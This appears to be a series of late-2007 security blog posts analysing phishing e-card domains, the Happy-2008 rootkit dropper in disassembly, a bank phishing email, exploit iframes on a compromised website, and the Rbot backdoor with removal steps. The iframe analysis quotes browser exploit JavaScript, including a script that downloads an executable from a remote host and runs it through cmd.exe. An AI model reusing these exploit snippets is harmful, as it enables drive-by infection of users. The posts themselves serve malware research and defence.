[Malware] The Phishing Storm of 2008

Caution the following post contains explicit malware content, be careful!!!!

As every end of year Web registers a significative incrase of Malware attacks over various fronts, in particular WebSite Phishing Frauds, File Infection and New Rootkits.

This information can be verified by consulting http://www.antiphishing.org/

Obviously 90% of Frauds comes from fake Websitesin topic with the current Holidays, such as Christmas Gifts, E-Card / Postcard Online services. In the last days for example I’ve founded two phishing E-Card WebSites:

familypostcards2008.com

uhavepostcard.com

Let’s lookup the first WebSite:

———————————

Domain name:             UHAVEPOSTCARD.COM
Name Server:             ns.uhavepostcard.com 74.66.92.4
Name Server:             ns10.uhavepostcard.com 193.150.206.29
Name Server:             ns11.uhavepostcard.com 24.151.246.25
Name Server:             ns12.uhavepostcard.com 78.60.126.188
Name Server:             ns13.uhavepostcard.com 78.60.126.188
Name Server:             ns2.uhavepostcard.com 71.11.228.181
Name Server:             ns3.uhavepostcard.com 76.236.158.155
Name Server:             ns4.uhavepostcard.com 76.226.91.98
Name Server:             ns5.uhavepostcard.com 68.45.61.150
Name Server:             ns6.uhavepostcard.com 65.35.110.50
Name Server:             ns7.uhavepostcard.com 67.58.159.109
Name Server:             ns8.uhavepostcard.com 70.92.107.11
Name Server:             ns9.uhavepostcard.com 12.216.86.166
Creation Date:           2007.12.23
Updated Date:            2007.12.24
Expiration Date:         2008.12.23

---------------------------------

Domain name:             FAMILYPOSTCARDS2008.COM
Name Server:             ns.familypostcards2008.com 71.130.195.9
Name Server:             ns10.familypostcards2008.com 86.137.196.186
Name Server:             ns11.familypostcards2008.com 78.60.126.188
Name Server:             ns12.familypostcards2008.com 76.174.52.123
Name Server:             ns13.familypostcards2008.com 71.230.66.163
Name Server:             ns2.familypostcards2008.com 76.205.135.226
Name Server:             ns3.familypostcards2008.com 75.9.137.204
Name Server:             ns4.familypostcards2008.com 76.206.232.36
Name Server:             ns5.familypostcards2008.com 98.201.54.7
Name Server:             ns6.familypostcards2008.com 69.247.162.86
Name Server:             ns7.familypostcards2008.com 74.161.36.118
Name Server:             ns8.familypostcards2008.com 12.217.82.249
Name Server:             ns9.familypostcards2008.com 193.150.206.29
Creation Date:           2007.12.29
Updated Date:            2007.12.29
Expiration Date:         2008.12.29

———————————

Its truly curious that these domains comes from Los Angeles and are created only for these hollidays 🙂

The spreaded malware is always the same but in different forms:

• happy_2008.exe
• Happy2008.exe
• stripshow.exe
• happynewyear2008.exe

So pay attention to these Postcard sites.. 😉

Regard,

Evilcry

[MALWARE] Happy-2008.exe Win32.Zhelatin.pk Rootkit

Happy-2008 seems to be a new kind of virus, created in occasion of
new year.

Its spreaded in form of Executable, not packed or PE Tricked.
It can be downloaded from an E-Card WebSite.

At the actual state seems that AVs does not detects it, only someone
show it as Suspect-Zipped-File.

.:: The Essay :..

Gets the Current System Directory and next sets up as working directory
/system32.

Next with GetFullPathNameA retrives “C:\WINDOWS\System32\init_sys.config”

If file exists tries to determine its attributes, else creates a file

0040126A  PUSH EBX                                 ; /hTemplateFile => NULL
0040126B  PUSH 80                                  ; |Attributes = NORMAL
00401270  PUSH 2                                   ; |Mode = CREATE_ALWAYS
00401272  PUSH EBX                                 ; |pSecurity => NULL
00401273  PUSH 7                                   ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE|4
00401275  PUSH 40000000                            ; |Access = GENERIC_WRITE
0040127A  LEA EAX,DWORD PTR SS:[EBP-114]           ; |
00401280  PUSH EAX                                 ; |FileName = “C:\WINDOWS\System32\init_sys.config”
00401281  CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA

00401293  PUSH ESI ;Points to an Embedded Executable
00401294  PUSH EDI
00401295  MOV EDI,DWORD PTR DS:[<&KERNEL32.WriteFi>;  kernel32.WriteFile
0040129B  PUSH 0
0040129D  LEA EAX,DWORD PTR SS:[EBP-C] ;System Path
004012A0  PUSH EAX
004012A1  LEA ESI,DWORD PTR DS:[EBX+422A98] ; [config] String
004012A7  PUSH DWORD PTR DS:[ESI]

A file “init_sys.config” is created and filled with three entries:
[config]
[local]
[peers]

Successively, a series of values are attached into this config file, immediately after
[peers] and have this form:

00003D6C8F338A3FDD3DF3648666F55C=0CCFC042170F00

0040132D  CALL happy-20.0040122D       ;Builds init_sys.config and fill it
00401332  LEA ECX,DWORD PTR SS:[EBP-8]
00401335  CALL happy-20.004016E8
…
00401351  CALL happy-20.00401634 ;EAX = String obtained from GetSystemTime Output
…

After some calls, EAX points to a new string “init_1a30-12f1”

00401391   PUSH EAX                                 ; /pFilenameInPath
00401392   PUSH DWORD PTR SS:[EBP-8]                ; |Path
00401395   PUSH EBX                                 ; |MaxPathSize
00401396   PUSH DWORD PTR SS:[EBP-4]                ; |FileName
00401399   CALL DWORD PTR DS:[<&KERNEL32.GetFullPat>; \GetFullPathNameA
0040139F   PUSH happy-20.004020D4                   ;  ASCII “.sys”
004013A4   LEA ECX,DWORD PTR SS:[EBP-8]
004013A7   CALL happy-20.00401108

Inside the call 00401108 a new string is assembled “init_1a30-12f1.sys”
please note that the numerical part of the Sys file, changes at every run
because it depends from GetSystemTime output.

004013B1   PUSH ESI ;NULL
004013B2   PUSH ESI ;NULL
004013B3   CALL OpenSCManagerA
004013B9   CMP EAX,ESI
004013BB   MOV DWORD PTR SS:[EBP-C],EAX
004013BE   JE happy-20.004014D9

After opening Service Manager for LocalHost, Service Status is enumerated and:

00401407  PUSH DWORD PTR SS:[EBP-18]             ; /Arg3
0040140A  PUSH EDI                               ; |Arg2
0040140B  PUSH DWORD PTR DS:[EBX]                ; |Arg1 = 0012FE62 ASCII “Abiosdsk”
0040140D  CALL happy-20.00401579                 ; \happy-20.00401579

This Call compares the Services Name presents in the sistem, with ‘init_’

abp480n5,ACPI,adpu16, etc..

After this check an GetLastError is called:

0040142E  JNZ SHORT happy-20.0040143D
00401430  CALL GetLastError
00401436  CMP EAX,0EA
0040143B  JE SHORT happy-20.004013D1

If the Service exists and is running, the task of happy_2008 ends here.
Else, a copy of a Device Driver is extracted from the executable and runned as
Kernel’s Service.

I’ve extracted that device driver with an HexEditor, it starts at 00403018 and ends at
00424FF8.

This rootkit hides itself, but in the next part we will discover what that what it
does 🙂

See you to the Second  part.. 🙂

(Merry Christmas || Happy Sol Invictus)

Merry Christmas!!!!!!!

May this Christmas be full of Peace and Serenity for You and Your Families..

 Regards,

Evilcry

The Thousands Ways of SPAM [CartaSi Fraud]

Hi,

As everyday also this morning I’ve checked my HoneyPot-MailAddress, and a curious mail message reatched me, this is the Original Recipient:

Gentile Cliente,

Il codice dispositivo del suo conto on-line e stato inserito incorretto piu di tre volte.
Per proteggere suo conto abbiamo sospeso il acceso.
Per recuperare il acceso prego di entrare e completare la pagina di attivazione.

Grazie ancora per aver scelto i servizi on-line di CartaSi.
I migliori saluti.

Servizio Clienti CartaSi
****************************************************************
VUOLE CONTESTARE SU UNA SPESA?

Easy Claim il servizio che fa per lei!

****************************************************************

Per favore, non risponda a questa mail: per eventuali comunicazioni, acceda al Portale Titolari (http://www.cartasi.it//) e ci scriva attraverso ‘Lo sportello del Cliente’: e’ il modo piu’ semplice per ottenere una rapida risposta dai nostri operatori.
Grazie della collaborazione.
++++++++++++++++++++++++++++++++++

CartaSi is a Bank service, but is really strange that Subject has Grammar Errors, let’s trace the first link with Malzilla..

WebSite: http://aquarossall.plus.com/

First operation is a Whois to this strange link that expose Music’s Albums Covers..

—————

Website Title:	PlusNet | Home & Business Broadband Internet Access & Phone Services UK
Title Relevancy	77%

—————————————

The links comes from PlusNet Network Malzilla detects also a Bridge of Redirections:

–> djtees.com/
–> djtees.com/tshop/store/default.asp?idAffiliate=
Redirection to index.asp –> djtees.com/tshop/store/index.asp
Website is not dangerous, but is surely boring to see these stupid forms of Spam .

See you to the next post.. 🙂

[MALWARE] Multiple Malware and Exploits on a Chinese WebSite

Hi,

A new virus similar to 31joy.com/rb.vg attacked some WebSites (one in particular {CENSORED}.biz), it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

Victims that browse this WebSite, are firstly Exploited (if poorly harmored) and successively infected by Adware and Spyware.

I’ve analysed the WebSite, with Malzilla, infection is a classical one, inserts malicious code at the top of pages, so when a Victim visits the site 4 Infected Iframes are loaded, and some ‘.js‘ and ‘.cab‘ are downloaded.

hxxp://{CENSORED}.biz/index.html
hxxp://{CENSORED}.biz/2.htm
hxxp://{CENSORED}.biz/xl.htm
http://CENSORED.php?idCENSOREDweCENSORED=pic1

Let’s analyse the First IFrame, a .js is loaded:function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf(“msie 6”)==-1&&user.indexOf(“msie 7”)==-1)

[…]

else if(RealVersion == “6.0.14.544”)
ret = unescape(“%63%11%08%60”);
else if(RealVersion == “6.0.14.550”)
ret = unescape(“%63%11%04%60”);
else if(RealVersion == “6.0.14.552”)
ret = unescape(“%79%31%01%60”);
else if(RealVersion == “6.0.14.543”)
ret = unescape(“%79%31%09%60”);
else if(RealVersion == “6.0.14.536”)
ret = unescape(“%51%11%70%63”);

[…]

}

It’s clear that the first IFrame launches the famous RealTime Exploit that allows Remote Code Execution.

Second IFrame, 2.htm conducts to another JavaScript:

function init()
{

var ado=(document.createElement(“object”));
ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36“);

This CLSID is suspicious let’s search about it, its another common Exploit: RDS.DataStore – Data Execution (CVS-2006-0003 / MS06-14), the IFrame itself loads others Objects:
0614.js
MPS.js
PowerPlayerCtrl.js
4.CAB -> that contains bd.exe OR r.exe and is Worm/Cekar.A

Let’s see the first 0614.js :

var url=”http://{CENSORED}/real.exe”;
[…]
xml.Open(“GET”,url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path=”..\\ntuser.com”;
as.savetofile(path,2);
as.close();
var shell=ado.createobject(“Shell.Application”,””);
shell.ShellExecute(“cmd.exe”,”/c ” + path,””,”open”,0)}
[…]
The previous Data Execution exploit, calls this JavaScript that downloads and executes real.exe, that is obviously a Virus, Win32.Worm.Cekar..

W32/Cekar-A includes functionality to download code from a preconfigured website to the local disk.

When first run W32/Cekar-A creates the following files:

\setup.exe
<System>\internat.exe
\autorun.inf

–> Third IFrame xl.htm

Calls clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F which is another exploit that attempts to exploit a buffer overflow vulnerability in Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX control, this leads to another Remote Code Execution.

–> Last IFrame, seems to be only a counter

See you to the next post! 🙂

Crypto Reverse Engineering Speech

Hi,

I’m working for a Chat-Conference Speech, on Cryptography and Reverse Engineering, for the Reversity program promoted by Reteam.

Obviously i accept suggestions and topics to talk about 🙂

First Reversity Session: POSTPONED to Sunday Jan 6 2008 12:00 EST (GMT-5) or 17:00 GMT 

On EFNet chan: #reversity

In the next days I’ll publish here the Talk Index

See you to the next post.. 🙂

RBN (Russian Bank Network) Analysis

Hi,

There are some places in the world where life is dangerous. Internet has some dark zones too and RBN is one of them. RBN stands for Russian Business Network and it’s a nebulous organisation which aims to fulfil cyber crime.

This study aims to provide some enlightenment on RBN activities and tries to detail how they work. Indeed RBN has many constituents and it’s hard to have an exact idea on the goal of some of them and the way they’re linked with other constituents.
There are some countermeasures available but they don’t make sense for home users or even companies. Only ISPs, IXPs and internet regulators can help mitigating risks originating from RBN and other malicious groups.

http://research-labs.net/news/13-Russian+Business+Network+study.html

http://www.bizeul.org/files/RBN_study.pdf

See you to the next post.. 🙂

[Malware] Backdoor.Win32.Rbot.clj Reversing

Hi,

Kaspersky Identification: Backdoor.Win32.Rbot.clj
MD5: 59c661ba0c7c485f4480f7b142a9c084

Backdoor.Rbot offers user remote access to victim machines. The Trojans are controlled via IRC and perfoms various operations of data estortion:

• Data Packet filtering passwords to FTP servers, and e-payment systems.
• Vulnerability check (RPC DCOM, UPnP, WebDAV).
• Other backdoor check NetDevil, SubSeven.
• Bridge for DoS attacks.
• Send the user of the program detailed information about the victim machine, including passwords to a range of computer games.

Rbot is a really stupid and unsophisticated virus, actually detected by all antiviruses, and can be removed in 1 minute by hand.

Rbot is packed with NSPack v 2.9, a truly common packer/compressor used in many viruses.
Unpacking it truly easy:

.nsp1:004DF1B4       pushf ; EP
.nsp1:004DF1B5       pusha
…
.nsp1:004DF424        popa
.nsp1:004DF425        popf
.nsp1:004DF426        jmp     near ptr dword_4DC8D0 ;OEP

You have only to put a Breakpoint on the JMP OEP, dump and rebuild the executable and you’ll have a 100% clear executable.
Following entries are added:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

and for each execution Rbot copies itself (every time with a different name) into  %System% directory.

Rbot can spread itself in various manners:

Via Network Shares (TCP ports 139 and 445)
Via Exploits like Windows LSASS buffer overflow, Windows ntdll.dll buffer overflow, Windows RPC malformed message buffer overflow, RPCSS malformed DCOM, UPnP, DameWare.

Via other Malicious Code:

• Win32.Bagle worm (TCP port 2745)
• Win32.Mydoom worm (TCP port 3127)
• Win32.OptixPro trojan (TCP port 3410)
• Win32.NetDevil trojan (TCP port 903)
• Win32.Kuang trojan (TCP port 17300)
• Win32.SubSeven trojan (TCP port 27347)

.:: Rbot Removal ::.

Locate the executable in %System% directory and remove it (remember that the .exe is Hidden)
Remove the reg keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

See you to the next post..

[Malware] nugbnljbphe.exe

Morning,

Today when i started pc, a strange executable caused me some problems “nugbnljbphe.exe” I suspect that’s a Malware, Kaspersky does not recognize it.

My suspects are confirmed by the presence of .nsp0 section, that indicates the presence of Nspack packer, heavly used in malware executables.

I’m going to reverse it..

See you to the next post.. 🙂